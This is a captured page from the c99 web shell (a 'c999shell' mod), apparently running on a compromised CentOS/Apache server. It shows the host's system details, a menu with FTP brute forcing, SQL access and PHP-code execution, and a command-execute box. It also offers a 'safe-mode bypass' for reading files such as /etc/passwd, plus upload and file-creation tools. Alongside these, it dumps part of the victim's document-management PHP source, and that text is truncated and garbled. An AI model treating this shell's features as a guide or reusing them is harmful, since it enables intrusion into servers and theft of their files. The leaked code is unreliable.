!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/admin/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     processRegisterDoc.php (60.06 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
";
}else if($method=="uploadfile"){ //uploadfile editregis
	$flagCommit = true;
	$oC->BeginTrans();
	
		//--------------edit documents
		$oDoc->SearchByKey($DocID);
		if($oDoc->GetRecord()=="1"){
				$oDoc->Edit();
				$oDoc->DlcID=$DlcID;
				//echo "DlcID=".$oDoc->DlcID."
"; $oDoc->DtID=$DtID; //echo "DtID=".$oDoc->DtID."
"; $oDoc->DslID=$DslID; //echo "DslID=".$oDoc->DslID."
"; $oDoc->DclID=$DclID; //echo "DclID=".$oDoc->DclID."
"; $oDoc->RsID=$RsID; //echo "RsID=".$oDoc->RsID."
"; $DocDateCreate=$oDoc->DocDateCreate; $oDoc->DocDate=splitDateForm($DocDate,"/"); //echo "DocDate=".$oDoc->DocDate."
"; $oDoc->DocNo=$DocNo; //echo "DocNo=".$oDoc->DocNo."
"; $oDoc->DocSubject=$DocSubject; //echo "DocSubject=".$oDoc->DocSubject."
"; $oDoc->DocFrom=$DocFrom; //echo "DocFrom=".$oDoc->DocFrom."
"; $oDoc->DocTo=$DocTo; //echo "DocTo=".$oDoc->DocTo."
"; $oDoc->DocShortDesc=$DocShortDesc; //echo "DocShortDesc=".$oDoc->DocShortDesc."
"; $oDoc->DocRef=$DocRef; //echo "DocRef=".$oDoc->DocRef."
"; if($DocfCir=="Y"){ $DocfCir_="Y"; }else{ $DocfCir_="N"; } $oDoc->DocfCir=$DocfCir_; //echo "DocfCir=".$oDoc->DocfCir."
"; $oDoc->DocOther=$DocOther; //echo "DocOther=".$oDoc->DocOther."
"; $oDoc->CertificatePs=$CertificatePs; //echo "CertificatePs=".$oDoc->CertificatePs."
"; $oDoc->endDoc=$endDoc; //echo "endDoc=".$oDoc->endDoc."
"; if($DrsSendToPs=="Y"){ $sendToPs_="Y"; }else{ $sendToPs_="N"; } $oDoc->sendToPs=$sendToPs_; if($useMainDocNo=="Y"){ $useMainDocNo="Y"; }else{ $useMainDocNo="N"; } $oDoc->useMainDocNo=$useMainDocNo; if($DocforSign=="Y"){ $useDocforSign="Y"; }else{ $useDocforSign="N"; } $oDoc->DocforSign=$useDocforSign; $flagCommit = $oDoc->Save(); } //----------add DocAttatches $file = $_FILES['fileupload']['name']; $sizefile = $_FILES['fileupload']['size']; $filetype=strstr($file,'.'); $str = $file; $len=strlen($str); $count=0; for($i=0; $i<$len; $i++){ //echo $str{$i}."
"; $asci=ord($str{$i}); if($asci == 46){ $count++; } if($asci == 44){ $count++; } } $oSys->RSsysConfig(); $oSys->GetRecord(); $oSys->filesizebyte; $sizefileM=($oSys->filesizebyte/1024/1024); if($count>1){ if($flagCommit) $oC->CommitTrans(); else $oC->RollbackTrans(); ?>
"; }else if($sizefile>$oSys->filesizebyte
bool(false)

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]--